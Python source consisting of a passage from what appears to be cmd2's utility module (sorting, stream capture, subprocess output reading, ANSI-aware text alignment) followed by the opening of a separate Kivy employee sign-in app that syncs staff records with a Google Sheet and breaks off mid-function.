self.settable_obj = settable_object
self.settable_attrib_name = settable_attrib_name if settable_attrib_name is not None else name
self.onchange_cb = onchange_cb
self.choices = choices
self.choices_provider = choices_provider
self.completer = completer
def get_value(self) -> Any:
"""
Get the value of the settable attribute
:return:
"""
return getattr(self.settable_obj, self.settable_attrib_name)
def set_value(self, value: Any) -> Any:
"""
Set the settable attribute on the specified destination object
:param value: New value to set
:return: New value that the attribute was set to
"""
# Try to update the settable's value
orig_value = self.get_value()
setattr(self.settable_obj, self.settable_attrib_name, self.val_type(value))
new_value = getattr(self.settable_obj, self.settable_attrib_name)
# Check if we need to call an onchange callback
if orig_value != new_value and self.onchange_cb:
self.onchange_cb(self.name, orig_value, new_value)
return new_value
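# Minimal usage sketch (illustrative, not part of this module): inside a
# cmd2.Cmd subclass that defines `self.timeout = 30`, the attribute is
# typically exposed to the `set` command roughly like this:
#
#     self.add_settable(Settable('timeout', int, 'Network timeout in seconds', self))
#
# `set timeout 60` then casts "60" with int() via set_value() and, if an
# onchange_cb was supplied, calls it as onchange_cb('timeout', 30, 60).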
def is_text_file(file_path: str) -> bool:
"""Returns if a file contains only ASCII or UTF-8 encoded text.
:param file_path: path to the file being checked
:return: True if the file is a text file, False if it is binary.
"""
import codecs
expanded_path = os.path.abspath(os.path.expanduser(file_path.strip()))
valid_text_file = False
# Check if the file is ASCII
try:
with codecs.open(expanded_path, encoding='ascii', errors='strict') as f:
# Make sure the file has at least one line of text
# noinspection PyUnusedLocal
if sum(1 for line in f) > 0:
valid_text_file = True
except OSError: # pragma: no cover
pass
except UnicodeDecodeError:
# The file is not ASCII. Check if it is UTF-8.
try:
with codecs.open(expanded_path, encoding='utf-8', errors='strict') as f:
# Make sure the file has at least one line of text
# noinspection PyUnusedLocal
if sum(1 for line in f) > 0:
valid_text_file = True
except OSError: # pragma: no cover
pass
except UnicodeDecodeError:
# Not UTF-8
pass
return valid_text_file
def remove_duplicates(list_to_prune: List[_T]) -> List[_T]:
"""Removes duplicates from a list while preserving order of the items.
:param list_to_prune: the list being pruned of duplicates
:return: The pruned list
"""
temp_dict: collections.OrderedDict[_T, Any] = collections.OrderedDict()
for item in list_to_prune:
temp_dict[item] = None
return list(temp_dict.keys())
def norm_fold(astr: str) -> str:
"""Normalize and casefold Unicode strings for saner comparisons.
:param astr: input unicode string
:return: a normalized and case-folded version of the input string
"""
return unicodedata.normalize('NFC', astr).casefold()
def alphabetical_sort(list_to_sort: Iterable[str]) -> List[str]:
"""Sorts a list of strings alphabetically.
For example: ['a1', 'A11', 'A2', 'a22', 'a3']
To sort a list in place, don't call this method, which makes a copy. Instead, do this:
my_list.sort(key=norm_fold)
:param list_to_sort: the list being sorted
:return: the sorted list
"""
return sorted(list_to_sort, key=norm_fold)
def try_int_or_force_to_lower_case(input_str: str) -> Union[int, str]:
"""
Tries to convert the passed-in string to an integer. If that fails, it converts it to lower case using norm_fold.
:param input_str: string to convert
:return: the string as an integer or a lower case version of the string
"""
try:
return int(input_str)
except ValueError:
return norm_fold(input_str)
def natural_keys(input_str: str) -> List[Union[int, str]]:
"""
Converts a string into a list of integers and strings to support natural sorting (see natural_sort).
For example: natural_keys('abc123def') -> ['abc', '123', 'def']
:param input_str: string to convert
:return: list of strings and integers
"""
return [try_int_or_force_to_lower_case(substr) for substr in re.split(r'(\d+)', input_str)]
def natural_sort(list_to_sort: Iterable[str]) -> List[str]:
"""
Sorts a list of strings case insensitively as well as numerically.
For example: ['a1', 'A2', 'a3', 'A11', 'a22']
To sort a list in place, don't call this method, which makes a copy. Instead, do this:
my_list.sort(key=natural_keys)
:param list_to_sort: the list being sorted
:return: the list sorted naturally
"""
return sorted(list_to_sort, key=natural_keys)
def quote_specific_tokens(tokens: List[str], tokens_to_quote: List[str]) -> None:
"""
Quote specific tokens in a list
:param tokens: token list being edited
:param tokens_to_quote: the tokens, which if present in tokens, to quote
"""
for i, token in enumerate(tokens):
if token in tokens_to_quote:
tokens[i] = quote_string(token)
def unquote_specific_tokens(tokens: List[str], tokens_to_unquote: List[str]) -> None:
"""
Unquote specific tokens in a list
:param tokens: token list being edited
:param tokens_to_unquote: the tokens, which if present in tokens, to unquote
"""
for i, token in enumerate(tokens):
unquoted_token = strip_quotes(token)
if unquoted_token in tokens_to_unquote:
tokens[i] = unquoted_token
def expand_user(token: str) -> str:
"""
Wrap os.expanduser() to support expanding ~ in quoted strings
:param token: the string to expand
"""
if token:
if is_quoted(token):
quote_char = token[0]
token = strip_quotes(token)
else:
quote_char = ''
token = os.path.expanduser(token)
# Restore the quotes even if not needed to preserve what the user typed
if quote_char:
token = quote_char + token + quote_char
return token
def expand_user_in_tokens(tokens: List[str]) -> None:
"""
Call expand_user() on all tokens in a list of strings
:param tokens: tokens to expand
"""
for index, _ in enumerate(tokens):
tokens[index] = expand_user(tokens[index])
def find_editor() -> Optional[str]:
"""
Used to set cmd2.Cmd.DEFAULT_EDITOR. If EDITOR env variable is set, that will be used.
Otherwise the function will look for a known editor in directories specified by PATH env variable.
:return: Default editor or None
"""
editor = os.environ.get('EDITOR')
if not editor:
if sys.platform[:3] == 'win':
editors = ['code.cmd', 'notepad++.exe', 'notepad.exe']
else:
editors = ['vim', 'vi', 'emacs', 'nano', 'pico', 'joe', 'code', 'subl', 'atom', 'gedit', 'geany', 'kate']
# Get a list of every directory in the PATH environment variable and ignore symbolic links
env_path = os.getenv('PATH')
if env_path is None:
paths = []
else:
paths = [p for p in env_path.split(os.path.pathsep) if not os.path.islink(p)]
for editor, path in itertools.product(editors, paths):
editor_path = os.path.join(path, editor)
if os.path.isfile(editor_path) and os.access(editor_path, os.X_OK):
if sys.platform[:3] == 'win':
# Remove extension from Windows file names
editor = os.path.splitext(editor)[0]
break
else:
editor = None
return editor
def files_from_glob_pattern(pattern: str, access: int = os.F_OK) -> List[str]:
"""Return a list of file paths based on a glob pattern.
    Only files are returned, not directories, and optionally only files for which the user has the specified access.
:param pattern: file name or glob pattern
:param access: file access type to verify (os.* where * is F_OK, R_OK, W_OK, or X_OK)
:return: list of files matching the name or glob pattern
"""
return [f for f in glob.glob(pattern) if os.path.isfile(f) and os.access(f, access)]
def files_from_glob_patterns(patterns: List[str], access: int = os.F_OK) -> List[str]:
"""Return a list of file paths based on a list of glob patterns.
    Only files are returned, not directories, and optionally only files for which the user has the specified access.
:param patterns: list of file names and/or glob patterns
:param access: file access type to verify (os.* where * is F_OK, R_OK, W_OK, or X_OK)
:return: list of files matching the names and/or glob patterns
"""
files = []
for pattern in patterns:
matches = files_from_glob_pattern(pattern, access=access)
files.extend(matches)
return files
def get_exes_in_path(starts_with: str) -> List[str]:
"""Returns names of executables in a user's path
:param starts_with: what the exes should start with. leave blank for all exes in path.
:return: a list of matching exe names
"""
# Purposely don't match any executable containing wildcards
wildcards = ['*', '?']
for wildcard in wildcards:
if wildcard in starts_with:
return []
# Get a list of every directory in the PATH environment variable and ignore symbolic links
env_path = os.getenv('PATH')
if env_path is None:
paths = []
else:
paths = [p for p in env_path.split(os.path.pathsep) if not os.path.islink(p)]
# Use a set to store exe names since there can be duplicates
exes_set = set()
# Find every executable file in the user's path that matches the pattern
for path in paths:
full_path = os.path.join(path, starts_with)
matches = files_from_glob_pattern(full_path + '*', access=os.X_OK)
for match in matches:
exes_set.add(os.path.basename(match))
return list(exes_set)
class StdSim:
"""
Class to simulate behavior of sys.stdout or sys.stderr.
Stores contents in internal buffer and optionally echos to the inner stream it is simulating.
"""
def __init__(
self,
inner_stream: Union[TextIO, 'StdSim'],
*,
echo: bool = False,
encoding: str = 'utf-8',
errors: str = 'replace',
) -> None:
"""
StdSim Initializer
:param inner_stream: the wrapped stream. Should be a TextIO or StdSim instance.
:param echo: if True, then all input will be echoed to inner_stream
:param encoding: codec for encoding/decoding strings (defaults to utf-8)
:param errors: how to handle encoding/decoding errors (defaults to replace)
"""
self.inner_stream = inner_stream
self.echo = echo
self.encoding = encoding
self.errors = errors
self.pause_storage = False
self.buffer = ByteBuf(self)
def write(self, s: str) -> None:
"""
Add str to internal bytes buffer and if echo is True, echo contents to inner stream
:param s: String to write to the stream
"""
if not isinstance(s, str):
raise TypeError('write() argument must be str, not {}'.format(type(s)))
if not self.pause_storage:
self.buffer.byte_buf += s.encode(encoding=self.encoding, errors=self.errors)
if self.echo:
self.inner_stream.write(s)
def getvalue(self) -> str:
"""Get the internal contents as a str"""
return self.buffer.byte_buf.decode(encoding=self.encoding, errors=self.errors)
def getbytes(self) -> bytes:
"""Get the internal contents as bytes"""
return bytes(self.buffer.byte_buf)
def read(self, size: Optional[int] = -1) -> str:
"""
Read from the internal contents as a str and then clear them out
:param size: Number of bytes to read from the stream
"""
if size is None or size == -1:
result = self.getvalue()
self.clear()
else:
result = self.buffer.byte_buf[:size].decode(encoding=self.encoding, errors=self.errors)
self.buffer.byte_buf = self.buffer.byte_buf[size:]
return result
def readbytes(self) -> bytes:
"""Read from the internal contents as bytes and then clear them out"""
result = self.getbytes()
self.clear()
return result
def clear(self) -> None:
"""Clear the internal contents"""
self.buffer.byte_buf.clear()
def isatty(self) -> bool:
"""StdSim only considered an interactive stream if `echo` is True and `inner_stream` is a tty."""
if self.echo:
return self.inner_stream.isatty()
else:
return False
@property
def line_buffering(self) -> bool:
"""
Handle when the inner stream doesn't have a line_buffering attribute which is the case
when running unit tests because pytest sets stdout to a pytest EncodedFile object.
"""
try:
return bool(self.inner_stream.line_buffering)
except AttributeError:
return False
def __getattr__(self, item: str) -> Any:
if item in self.__dict__:
return self.__dict__[item]
else:
return getattr(self.inner_stream, item)
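# Quick capture sketch (illustrative): cmd2 substitutes a StdSim for sys.stdout
# while redirecting command output, roughly:
#
#     capture = StdSim(sys.stdout, echo=False)
#     capture.write('hello\n')
#     text = capture.getvalue()     # 'hello\n'
#     data = capture.getbytes()     # b'hello\n'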
class ByteBuf:
"""
Used by StdSim to write binary data and stores the actual bytes written
"""
# Used to know when to flush the StdSim
NEWLINES = [b'\n', b'\r']
def __init__(self, std_sim_instance: StdSim) -> None:
self.byte_buf = bytearray()
self.std_sim_instance = std_sim_instance
def write(self, b: bytes) -> None:
"""Add bytes to internal bytes buffer and if echo is True, echo contents to inner stream."""
if not isinstance(b, bytes):
raise TypeError('a bytes-like object is required, not {}'.format(type(b)))
if not self.std_sim_instance.pause_storage:
self.byte_buf += b
if self.std_sim_instance.echo:
self.std_sim_instance.inner_stream.buffer.write(b)
# Since StdSim wraps TextIO streams, we will flush the stream if line buffering is on
# and the bytes being written contain a new line character. This is helpful when StdSim
# is being used to capture output of a shell command because it causes the output to print
# to the screen more often than if we waited for the stream to flush its buffer.
if self.std_sim_instance.line_buffering:
if any(newline in b for newline in ByteBuf.NEWLINES):
self.std_sim_instance.flush()
class ProcReader:
"""
Used to capture stdout and stderr from a Popen process if any of those were set to subprocess.PIPE.
If neither are pipes, then the process will run normally and no output will be captured.
"""
def __init__(self, proc: subprocess.Popen, stdout: Union[StdSim, TextIO], stderr: Union[StdSim, TextIO]) -> None:
"""
ProcReader initializer
:param proc: the Popen process being read from
:param stdout: the stream to write captured stdout
:param stderr: the stream to write captured stderr
"""
self._proc = proc
self._stdout = stdout
self._stderr = stderr
self._out_thread = threading.Thread(name='out_thread', target=self._reader_thread_func, kwargs={'read_stdout': True})
        self._err_thread = threading.Thread(name='err_thread', target=self._reader_thread_func, kwargs={'read_stdout': False})
# Start the reader threads for pipes only
if self._proc.stdout is not None:
self._out_thread.start()
if self._proc.stderr is not None:
self._err_thread.start()
def send_sigint(self) -> None:
"""Send a SIGINT to the process similar to if <Ctrl>+C were pressed"""
import signal
if sys.platform.startswith('win'):
# cmd2 started the Windows process in a new process group. Therefore
# a CTRL_C_EVENT can't be sent to it. Send a CTRL_BREAK_EVENT instead.
self._proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
# Since cmd2 uses shell=True in its Popen calls, we need to send the SIGINT to
# the whole process group to make sure it propagates further than the shell
try:
group_id = os.getpgid(self._proc.pid)
os.killpg(group_id, signal.SIGINT)
except ProcessLookupError:
return
def terminate(self) -> None:
"""Terminate the process"""
self._proc.terminate()
def wait(self) -> None:
"""Wait for the process to finish"""
if self._out_thread.is_alive():
self._out_thread.join()
if self._err_thread.is_alive():
self._err_thread.join()
# Handle case where the process ended before the last read could be done.
# This will return None for the streams that weren't pipes.
out, err = self._proc.communicate()
if out:
self._write_bytes(self._stdout, out)
if err:
self._write_bytes(self._stderr, err)
def _reader_thread_func(self, read_stdout: bool) -> None:
"""
Thread function that reads a stream from the process
:param read_stdout: if True, then this thread deals with stdout. Otherwise it deals with stderr.
"""
if read_stdout:
read_stream = self._proc.stdout
write_stream = self._stdout
else:
read_stream = self._proc.stderr
write_stream = self._stderr
# The thread should have been started only if this stream was a pipe
assert read_stream is not None
# Run until process completes
while self._proc.poll() is None:
# noinspection PyUnresolvedReferences
available = read_stream.peek()
if available:
read_stream.read(len(available))
self._write_bytes(write_stream, available)
@staticmethod
def _write_bytes(stream: Union[StdSim, TextIO], to_write: bytes) -> None:
"""
Write bytes to a stream
:param stream: the stream being written to
:param to_write: the bytes being written
"""
try:
stream.buffer.write(to_write)
except BrokenPipeError:
# This occurs if output is being piped to a process that closed
pass
class ContextFlag:
"""A context manager which is also used as a boolean flag value within the default sigint handler.
Its main use is as a flag to prevent the SIGINT handler in cmd2 from raising a KeyboardInterrupt
while a critical code section has set the flag to True. Because signal handling is always done on the
main thread, this class is not thread-safe since there is no need.
"""
def __init__(self) -> None:
# When this flag has a positive value, it is considered set.
# When it is 0, it is not set. It should never go below 0.
self.__count = 0
def __bool__(self) -> bool:
return self.__count > 0
def __enter__(self) -> None:
self.__count += 1
def __exit__(self, *args: Any) -> None:
self.__count -= 1
if self.__count < 0:
raise ValueError("count has gone below 0")
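# Typical usage sketch (illustrative): cmd2 keeps one ContextFlag and consults
# it from its SIGINT handler, roughly:
#
#     sigint_protection = ContextFlag()
#
#     def sigint_handler(signum, frame):
#         if not sigint_protection:          # only interrupt outside critical sections
#             raise KeyboardInterrupt()
#
#     with sigint_protection:                # __enter__ increments, __exit__ decrements
#         do_critical_work()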
class RedirectionSavedState:
"""Created by each command to store information required to restore state after redirection"""
def __init__(
self,
self_stdout: Union[StdSim, IO[str]],
sys_stdout: Union[StdSim, IO[str]],
pipe_proc_reader: Optional[ProcReader],
saved_redirecting: bool,
) -> None:
"""
RedirectionSavedState initializer
:param self_stdout: saved value of Cmd.stdout
:param sys_stdout: saved value of sys.stdout
:param pipe_proc_reader: saved value of Cmd._cur_pipe_proc_reader
:param saved_redirecting: saved value of Cmd._redirecting
"""
# Tells if command is redirecting
self.redirecting = False
# Used to restore values after redirection ends
self.saved_self_stdout = self_stdout
self.saved_sys_stdout = sys_stdout
# Used to restore values after command ends regardless of whether the command redirected
self.saved_pipe_proc_reader = pipe_proc_reader
self.saved_redirecting = saved_redirecting
class TextAlignment(Enum):
"""Horizontal text alignment"""
LEFT = 1
CENTER = 2
RIGHT = 3
def align_text(
text: str,
alignment: TextAlignment,
*,
fill_char: str = ' ',
width: Optional[int] = None,
tab_width: int = 4,
truncate: bool = False,
) -> str:
"""
Align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
There are convenience wrappers around this function: align_left(), align_center(), and align_right()
:param text: text to align (can contain multiple lines)
:param alignment: how to align the text
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then each line will be shortened to fit within the display width. The truncated
portions are replaced by a '…' character. Defaults to False.
:return: aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
import io
import shutil
from . import (
ansi,
)
if width is None:
width = shutil.get_terminal_size().columns
if width < 1:
raise ValueError("width must be at least 1")
# Handle tabs
text = text.replace('\t', ' ' * tab_width)
fill_char = fill_char.replace('\t', ' ')
if len(ansi.strip_style(fill_char)) != 1:
raise TypeError("Fill character must be exactly one character long")
fill_char_width = ansi.style_aware_wcswidth(fill_char)
if fill_char_width == -1:
raise (ValueError("Fill character is an unprintable character"))
if text:
lines = text.splitlines()
else:
lines = ['']
text_buf = io.StringIO()
# ANSI style sequences that may affect future lines will be cancelled by the fill_char's style.
# To avoid this, we save the state of a line's style so we can restore it when beginning the next line.
# This also allows the lines to be used independently and still have their style. TableCreator does this.
aggregate_styles = ''
# Save the ANSI style sequences in fill_char
fill_char_styles = get_styles_in_text(fill_char)
# Create a space with the same style as fill_char for cases in which
# fill_char does not divide evenly into the gap.
styled_space = ''
char_index = 0
while char_index < len(fill_char):
if char_index in fill_char_styles:
# Preserve this style in styled_space
styled_space += fill_char_styles[char_index]
char_index += len(fill_char_styles[char_index])
else:
# We've reached the visible fill_char. Replace it with a space.
styled_space += ' '
char_index += 1
for index, line in enumerate(lines):
if index > 0:
text_buf.write('\n')
if truncate:
line = truncate_line(line, width)
line_width = ansi.style_aware_wcswidth(line)
if line_width == -1:
raise (ValueError("Text to align contains an unprintable character"))
# Get the styles in this line
line_styles = get_styles_in_text(line)
# Calculate how wide each side of filling needs to be
if line_width >= width:
# Don't return here even though the line needs no fill chars.
# There may be styles sequences to restore.
total_fill_width = 0
else:
total_fill_width = width - line_width
if alignment == TextAlignment.LEFT:
left_fill_width = 0
right_fill_width = total_fill_width
elif alignment == TextAlignment.CENTER:
left_fill_width = total_fill_width // 2
right_fill_width = total_fill_width - left_fill_width
else:
left_fill_width = total_fill_width
right_fill_width = 0
# Determine how many fill characters are needed to cover the width
left_fill = (left_fill_width // fill_char_width) * fill_char
right_fill = (right_fill_width // fill_char_width) * fill_char
# In cases where the fill character display width didn't divide evenly into
# the gap being filled, pad the remainder with styled_space.
left_fill += styled_space * (left_fill_width - ansi.style_aware_wcswidth(left_fill))
right_fill += styled_space * (right_fill_width - ansi.style_aware_wcswidth(right_fill))
# Don't allow styles in fill_char and text to affect one another
if fill_char_styles or aggregate_styles or line_styles:
if left_fill:
left_fill = ansi.RESET_ALL + left_fill
left_fill += ansi.RESET_ALL
if right_fill:
right_fill = ansi.RESET_ALL + right_fill
right_fill += ansi.RESET_ALL
# Write the line and restore any styles from previous lines
text_buf.write(left_fill + aggregate_styles + line + right_fill)
# Update the aggregate with styles in this line
aggregate_styles += ''.join(line_styles.values())
return text_buf.getvalue()
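# Quick illustration of the alignment behavior above (plain text, space fill):
#
#     align_text('abc', TextAlignment.CENTER, width=7)  ->  '  abc  '
#     align_text('abc', TextAlignment.RIGHT, width=7)   ->  '    abc'
#
# When fill_char carries ANSI styling, the RESET_ALL guards keep that style
# from bleeding into the text and vice versa.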
def align_left(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Left align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to left align (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: left-aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.LEFT, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
def align_center(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Center text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to center (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: centered text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.CENTER, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
def align_right(
text: str, *, fill_char: str = ' ', width: Optional[int] = None, tab_width: int = 4, truncate: bool = False
) -> str:
"""
Right align text for display within a given width. Supports characters with display widths greater than 1.
ANSI style sequences do not count toward the display width. If text has line breaks, then each line is aligned
independently.
:param text: text to right align (can contain multiple lines)
:param fill_char: character that fills the alignment gap. Defaults to space. (Cannot be a line breaking character)
:param width: display width of the aligned text. Defaults to width of the terminal.
:param tab_width: any tabs in the text will be replaced with this many spaces. if fill_char is a tab, then it will
be converted to one space.
:param truncate: if True, then text will be shortened to fit within the display width. The truncated portion is
replaced by a '…' character. Defaults to False.
:return: right-aligned text
:raises: TypeError if fill_char is more than one character (not including ANSI style sequences)
:raises: ValueError if text or fill_char contains an unprintable character
:raises: ValueError if width is less than 1
"""
return align_text(text, TextAlignment.RIGHT, fill_char=fill_char, width=width, tab_width=tab_width, truncate=truncate)
def truncate_line(line: str, max_width: int, *, tab_width: int = 4) -> str:
"""
Truncate a single line to fit within a given display width. Any portion of the string that is truncated
is replaced by a '…' character. Supports characters with display widths greater than 1. ANSI style sequences
do not count toward the display width.
If there are ANSI style sequences in the string after where truncation occurs, this function will append them
to the returned string.
This is done to prevent issues caused in cases like: truncate_string(fg.blue + hello + fg.reset, 3)
In this case, "hello" would be truncated before fg.reset resets the color from blue. Appending the remaining style
sequences makes sure the style is in the same state had the entire string been printed. align_text() relies on this
behavior when preserving style over multiple lines.
:param line: text to truncate
:param max_width: the maximum display width the resulting string is allowed to have
:param tab_width: any tabs in the text will be replaced with this many spaces
:return: line that has a display width less than or equal to width
:raises: ValueError if text contains an unprintable character like a newline
:raises: ValueError if max_width is less than 1
"""
import io
from . import (
ansi,
)
# Handle tabs
line = line.replace('\t', ' ' * tab_width)
if ansi.style_aware_wcswidth(line) == -1:
raise (ValueError("text contains an unprintable character"))
if max_width < 1:
raise ValueError("max_width must be at least 1")
if ansi.style_aware_wcswidth(line) <= max_width:
return line
# Find all style sequences in the line
styles = get_styles_in_text(line)
# Add characters one by one and preserve all style sequences
done = False
index = 0
total_width = 0
truncated_buf = io.StringIO()
while not done:
# Check if a style sequence is at this index. These don't count toward display width.
if index in styles:
truncated_buf.write(styles[index])
style_len = len(styles[index])
styles.pop(index)
index += style_len
continue
char = line[index]
char_width = ansi.style_aware_wcswidth(char)
# This char will make the text too wide, add the ellipsis instead
if char_width + total_width >= max_width:
char = constants.HORIZONTAL_ELLIPSIS
char_width = ansi.style_aware_wcswidth(char)
done = True
total_width += char_width
truncated_buf.write(char)
index += 1
# Append remaining style sequences from original string
truncated_buf.write(''.join(styles.values()))
return truncated_buf.getvalue()
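# Example of the truncation behavior implemented above:
#
#     truncate_line('hello world', 5)  ->  'hell…'
#
# The ellipsis counts toward the display width, so the result is never wider
# than max_width, and trailing ANSI style sequences are preserved.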
def get_styles_in_text(text: str) -> Dict[int, str]:
"""
Return an OrderedDict containing all ANSI style sequences found in a string
The structure of the dictionary is:
key: index where sequences begins
value: ANSI style sequence found at index in text
Keys are in ascending order
:param text: text to search for style sequences
"""
from . import (
ansi,
)
start = 0
styles = collections.OrderedDict()
while True:
match = ansi.ANSI_STYLE_RE.search(text, start)
if match is None:
break
styles[match.start()] = match.group()
start += len(match.group())
return styles
def categorize(func: Union[Callable[..., Any], Iterable[Callable[..., Any]]], category: str) -> None:
"""Categorize a function.
The help command output will group the passed function under the
specified category heading
:param func: function or list of functions to categorize
:param category: category to put it in
:Example:
>>> import cmd2
>>> class MyApp(cmd2.Cmd):
>>> def do_echo(self, arglist):
    >>>     self.poutput(' '.join(arglist))
>>>
>>> cmd2.utils.categorize(do_echo, "Text Processing")
For an alternative approach to categorizing commands using a decorator, see
:func:`~cmd2.decorators.with_category`
"""
if isinstance(func, Iterable):
for item in func:
setattr(item, constants.CMD_ATTR_HELP_CATEGORY, category)
else:
if inspect.ismethod(func):
setattr(func.__func__, constants.CMD_ATTR_HELP_CATEGORY, category) # type: ignore[attr-defined]
else:
setattr(func, constants.CMD_ATTR_HELP_CATEGORY, category)
def get_defining_class(meth: Callable[..., Any]) -> Optional[Type[Any]]:
"""
Attempts to resolve the class that defined a method.
Inspired by implementation published here:
https://stackoverflow.com/a/25959545/1956611
:param meth: method to inspect
:return: class type in which the supplied method was defined. None if it couldn't be resolved.
"""
if isinstance(meth, functools.partial):
return get_defining_class(meth.func)
if inspect.ismethod(meth) or (
inspect.isbuiltin(meth)
and getattr(meth, '__self__') is not None
and getattr(meth.__self__, '__class__') # type: ignore[attr-defined]
):
for cls in inspect.getmro(meth.__self__.__class__): # type: ignore[attr-defined]
if meth.__name__ in cls.__dict__:
return cls
meth = getattr(meth, '__func__', meth) # fallback to __qualname__ parsing
if inspect.isfunction(meth):
cls = getattr(inspect.getmodule(meth), meth.__qualname__.split('.<locals>', 1)[0].rsplit('.', 1)[0])
if isinstance(cls, type):
return cls
return cast(type, getattr(meth, '__objclass__', None)) # handle special descriptor objects
class CompletionMode(Enum):
"""Enum for what type of tab completion to perform in cmd2.Cmd.read_input()"""
# Tab completion will be disabled during read_input() call
# Use of custom up-arrow history supported
NONE = 1
# read_input() will tab complete cmd2 commands and their arguments
# cmd2's command line history will be used for up arrow if history is not provided.
# Otherwise use of custom up-arrow history supported.
COMMANDS = 2
# read_input() will tab complete based on one of its following parameters:
# choices, choices_provider, completer, parser
# Use of custom up-arrow history supported
CUSTOM = 3
class CustomCompletionSettings:
"""Used by cmd2.Cmd.complete() to tab complete strings other than command arguments"""
def __init__(self, parser: argparse.ArgumentParser, *, preserve_quotes: bool = False):
"""
Initializer
:param parser: arg parser defining format of string being tab completed
:param preserve_quotes: if True, then quoted tokens will keep their quotes when processed by
ArgparseCompleter. This is helpful in cases when you're tab completing
flag-like tokens (e.g. -o, --option) and you don't want them to be
treated as argparse flags when quoted. Set this to True if you plan
on passing the string to argparse with the tokens still quoted.
"""
self.parser = parser
self.preserve_quotes = preserve_quotes
|
main.py
|
from kivy.app import App
import config
import datetime
import time
import threading
import pprint
from operator import itemgetter
import gspread
from oauth2client.service_account import ServiceAccountCredentials
from kivy.storage.jsonstore import JsonStore
from kivy.uix.button import Button
from kivy.uix.widget import Widget
from kivy.uix.label import Label
from kivy.properties import ObjectProperty, StringProperty, NumericProperty, BooleanProperty
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.recycleview import RecycleView
from kivy.uix.recycleview.views import RecycleDataViewBehavior
from kivy.uix.popup import Popup
# Helper Functions
pp = pprint.PrettyPrinter(indent=4)
# String to Boolean
def str2bool(s):
return s.lower() in ['true', 'yes']
# Boolean to String
def bool2str(b):
if b:
return "TRUE"
else:
return "FALSE"
# Weekday Array
Weekday = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
# Column Array
col = {'employeeNo' : 'A' ,'name' : 'B' ,'surname' : 'C' ,'active' : 'D' ,'signedIn' : 'E' ,'timeIn' : 'F' ,'timeOut' : 'G', 'normalHours' : 'H' }
# Employee Popup
class EmployeePopup(Popup):
# POPUP for displaying the controls for the employee sign in or sign out.
greeting = StringProperty()
message = StringProperty()
def __init__(self, employee, **kwargs):
self.employee = employee
if self.employee.signedIn:
self.greeting = "Goodbye, {} {}.".format(self.employee.name, self.employee.surname)
self.message = "Do you want to SIGN OUT? You signed in at " + self.employee.time_in_string
else:
self.greeting = "Hello, {} {}.".format(self.employee.name, self.employee.surname)
self.message = "Do you want to SIGN IN?"
super(EmployeePopup, self).__init__(**kwargs)
def logEmployee(self):
self.dismiss()
if (self.employee.signedIn):
self.employee.save_logout(self.employee)
else:
self.employee.save_login(self.employee)
# Employee List
class EmployeeList(RecycleView):
googleFile = "Employee Data"
dirtyRecords = []
threadRunning = False
def __init__(self, **kwargs):
# Get employee details from google and populate the app. If unable to connect,
# get the details from local storage.
# TODO: Check that the last saved version from google is the same as the local storage.
super(EmployeeList, self).__init__(**kwargs)
connected = True
employees = []
failedAttempts = 0
# Try to open the google worksheet to load employee data.
try:
employeeSheet = self.get_google_sheet(config.GOOGLE_CONFIG['employeeSheet'])
except:
print "Error connecting to the google server"
connected = False
if connected:
# Get employees from google and sort into alphabetical order (by Surname)
employeeImport = employeeSheet.get_all_records()
# Create local storage for the employees
store = JsonStore('employees.json')
for e in store:
store.delete(e)
for e in employeeImport :
# Convert yes/no fields to bool. Remove inactive users.
e['active'] = str2bool(e['active'])
if e['active']:
e['signedIn'] = str2bool(e['signedIn'])
# Add employee to local storage.
store.put(
e['employeeNo'],
name=e['name'],
surname=e['surname'],
signedIn=e['signedIn'],
timeIn=e['timeIn'],
timeOut=e['timeOut']
)
# Convert time string to datetime objects
if e['timeIn'] != "":
e['timeIn'] = datetime.datetime.strptime(e['timeIn'], "%Y-%m-%d %X")
if e['timeOut'] != "":
e['timeOut'] = datetime.datetime.strptime(e['timeOut'], "%Y-%m-%d %X")
# Create the data clean element
e['clean'] = True
# Add record to the employees
employees.append(e)
else:
# If the employee is inactive, remove from the list.
# employees.remove(e)
print "{} {} is DELETED".format(e['name'], e['surname'])
else:
# If unable to connect to google server, connect to local.
print('Failed to connect to Google Server')
store = JsonStore('employees.json')
for e in store:
# Check and convert time
if store.get(e)['timeIn'] != "":
